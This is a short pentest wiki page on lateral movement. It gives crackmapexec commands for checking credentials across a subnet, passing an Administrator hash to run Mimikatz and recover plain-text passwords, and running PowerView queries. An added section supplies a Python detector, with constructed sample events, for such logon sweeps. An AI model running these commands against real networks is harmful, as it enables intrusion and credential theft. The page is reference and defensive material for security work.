Lateral Movement

From pentestwiki.org

To check whether the credentials $USER / $PASSWORD are also valid on other computers in the network:

$ crackmapexec $IP/24 -u $USER -p $PASSWORD --lusers


Or, using an Administrator hash, run Mimikatz to gather plain-text passwords:

$ crackmapexec $IP/24 -u Administrator -H $HASH -d $DOMAIN -m modules/credentials/mimikatz.py
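On the defending side, both /24 sweeps above (password or hash) appear as one source address making network logons (type 3) with a single account on many hosts within seconds. The following is an added example, not part of the original page: it flags that pattern in Windows Security events 4624/4625, assuming the events are already parsed into dicts; the sample events, window and host threshold are constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

def _ev(ts, eid, host, user, ip, ltype=3):
    # Field names follow Windows Security events 4624 (logon) / 4625 (failed logon).
    return {"TimeCreated": ts, "EventID": eid, "Computer": host,
            "TargetUserName": user, "IpAddress": ip, "LogonType": ltype}

# Constructed sample events (not real logs).
SAMPLE_EVENTS = (
    # One source, one account, eight hosts in eight seconds: the sweep pattern.
    [_ev(f"2024-01-01T10:00:0{i}", 4624 if i % 3 else 4625, f"WS0{i}", "jdoe", "10.0.0.50")
     for i in range(1, 9)]
    # A user reaching the same file server repeatedly from one workstation.
    + [_ev(f"2024-01-01T09:{m}:00", 4624, "FS01", "asmith", "10.0.0.21") for m in (10, 20, 30)]
    # Interactive console logon (type 2): not a network logon, ignored.
    + [_ev("2024-01-01T09:05:00", 4624, "WS03", "asmith", "127.0.0.1", 2)]
    # An admin touching five servers, but hours apart.
    + [_ev(f"2024-01-01T{h}:00:00", 4624, f"SRV0{h - 10}", "admin2", "10.0.0.9")
       for h in range(11, 16)]
)

def detect_sweeps(events, window=timedelta(minutes=5), min_hosts=5):
    """Flag (source IP, account) pairs with network logons on >= min_hosts hosts within window."""
    by_key = defaultdict(list)
    for e in events:
        if e["EventID"] in (4624, 4625) and e["LogonType"] == 3:
            by_key[(e["IpAddress"], e["TargetUserName"])].append(
                (datetime.fromisoformat(e["TimeCreated"]), e["Computer"]))
    alerts = []
    for (src, user), hits in by_key.items():
        hits.sort()
        best, start = set(), 0
        for end in range(len(hits)):
            # Slide the window start forward until it spans at most `window`.
            while hits[end][0] - hits[start][0] > window:
                start += 1
            hosts = {h for _, h in hits[start:end + 1]}
            if len(hosts) > len(best):
                best = hosts
        if len(best) >= min_hosts:
            alerts.append({"source": src, "user": user, "hosts": sorted(best)})
    return alerts

if __name__ == "__main__":
    for a in detect_sweeps(SAMPLE_EVENTS):
        print(f"{a['source']} used {a['user']} on {len(a['hosts'])} hosts: {', '.join(a['hosts'])}")
```

Counting failed logons (4625) alongside successes matters here, because a credential check against a whole subnet usually fails on some hosts and succeeds on others.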


Run PowerView commands through crackmapexec:

$ crackmapexec smb $IP -d $DOMAIN -u $LOGIN -p $PASS -M powerview -o COMMAND="Get-NetDomain" --verbose


Other lateral movement techniques are described in Category:Lateral Movement.